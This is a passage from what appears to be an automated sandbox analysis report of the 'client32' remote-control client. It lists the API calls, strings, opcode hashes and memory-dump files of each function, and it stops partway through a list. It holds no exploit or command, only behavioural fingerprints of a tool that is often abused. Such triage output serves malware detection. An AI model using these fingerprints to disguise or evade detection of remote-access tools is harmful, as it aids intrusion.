                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                                        • API String ID: 275297366-914382535
                                                                                                                        • Opcode ID: 60a338348bb067c085c4a2ca94c1a4a5e1fac875370aa5f77a00b5083bbbe49e
                                                                                                                        • Instruction ID: 2e46e4b7baf199c2889004868545db68cd61fbd7e5d763fd9552678f82cbe9ef
                                                                                                                        • Opcode Fuzzy Hash: 60a338348bb067c085c4a2ca94c1a4a5e1fac875370aa5f77a00b5083bbbe49e
                                                                                                                        • Instruction Fuzzy Hash: 1D91C2B5D40259AFDF20DFA49CC1AFEB6B4AF44204F80057AD85AE6205F7315F88CB66
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                        • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                        • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                        • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                        • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                        • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                        • API String ID: 1946015-1270847556
                                                                                                                        • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                        • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                        • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                        • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B09A6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 685B09C3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 685B09CD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,socket), ref: 685B09DB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 685B09E9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 685B09F7
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 685B0A6C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                        • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                        • API String ID: 2449869053-2279908372
                                                                                                                        • Opcode ID: 8b909201f7fafeeffb218bc709d001203d038451e2502fc5eccc32dcd3132a14
                                                                                                                        • Instruction ID: 349decaf8d2eccb1c290a010f1d3b8a54825143aac5409a6fda2c076dcfbee9c
                                                                                                                        • Opcode Fuzzy Hash: 8b909201f7fafeeffb218bc709d001203d038451e2502fc5eccc32dcd3132a14
                                                                                                                        • Instruction Fuzzy Hash: 85318971B01218AFDB14AB788C59FEE7778EF86310F414195FD09A7280DA705D418F95
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A7E8D
                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,00000000,00000000,00000010,?,?), ref: 685A7E9A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7EB3
                                                                                                                        • _malloc.LIBCMT ref: 685A7ED8
                                                                                                                        • _memmove.LIBCMT ref: 685A7F20
                                                                                                                        • _free.LIBCMT ref: 685A7F31
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 685A7F3D
                                                                                                                        • _memmove.LIBCMT ref: 685A7F5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
                                                                                                                        • String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
                                                                                                                        • API String ID: 3275914093-1155488092
                                                                                                                        • Opcode ID: c9860b8c1a71741edae8e440fe7680b46d631933e06bdbb515427f7cd1afa361
                                                                                                                        • Instruction ID: 844c46a3c1b9a33321c390daa5a513842b8854f749ec74c3a715f680b9866e03
                                                                                                                        • Opcode Fuzzy Hash: c9860b8c1a71741edae8e440fe7680b46d631933e06bdbb515427f7cd1afa361
                                                                                                                        • Instruction Fuzzy Hash: B83181B6E00208ABDB009EB4DCC4DAE7778AB84354F804565FD68E7244E730EE4487A5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                        • API String ID: 2111968516-2092292787
                                                                                                                        • Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                        • Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
                                                                                                                        • Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                        • Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
                                                                                                                        • _memset.LIBCMT ref: 110FD3E2
                                                                                                                        • GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeLoad_memset
                                                                                                                        • String ID: 0$GetGUIThreadInfo$SendInput$user32
                                                                                                                        • API String ID: 530983809-271338563
                                                                                                                        • Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                        • Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
                                                                                                                        • Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                        • Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51
                                                                                                                        APIs
                                                                                                                        • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                        • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                        • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                        • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                        • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                        • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                        • API String ID: 13347155-1383313024
                                                                                                                        • Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                        • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                        • Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                        • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$BuildCatchMatchObjectType
                                                                                                                        • String ID: MOC$RCC$csm$csm
                                                                                                                        • API String ID: 1559916381-1441736206
                                                                                                                        • Opcode ID: 967c4be431842f86d27200744e3b9d4431ee30aa788ba5d335eb788f4280d563
                                                                                                                        • Instruction ID: 6d132c142fd04e4b751a78394098be51ec548bb192a40c60a071edda1d065b44
                                                                                                                        • Opcode Fuzzy Hash: 967c4be431842f86d27200744e3b9d4431ee30aa788ba5d335eb788f4280d563
                                                                                                                        • Instruction Fuzzy Hash: 1F31A435902344CFDB22CF64C4A476D77F8BF60306FD448AAD869A7251E734D944CB91
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8
                                                                                                                        • wsprintfA.USER32 ref: 11029157
                                                                                                                        • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                        • ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • _strrchr.LIBCMT ref: 110291E5
                                                                                                                        • ExitProcess.KERNEL32 ref: 11029224
                                                                                                                        Strings
                                                                                                                        • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
                                                                                                                        • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
                                                                                                                        • Client32, xrefs: 11029185
                                                                                                                        • V12.10F4, xrefs: 11029143
                                                                                                                        • Info. assert, restarting..., xrefs: 1102920D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
                                                                                                                        • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
                                                                                                                        • API String ID: 2763122592-3703414834
                                                                                                                        • Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
                                                                                                                        • Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
                                                                                                                        • Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
                                                                                                                        • Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • std::exception::exception.LIBCMT ref: 1113B29B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1113B2B0
                                                                                                                        • SetPropA.USER32(?,?,00000000), ref: 1113B33E
                                                                                                                        • GetPropA.USER32(?), ref: 1113B34D
                                                                                                                        • wsprintfA.USER32 ref: 1113B37F
                                                                                                                        • RemovePropA.USER32(?), ref: 1113B3B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
                                                                                                                        • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                        • API String ID: 1006086998-1590351400
                                                                                                                        • Opcode ID: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
                                                                                                                        • Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
                                                                                                                        • Opcode Fuzzy Hash: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
                                                                                                                        • Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 110FD17C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 110FD18A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
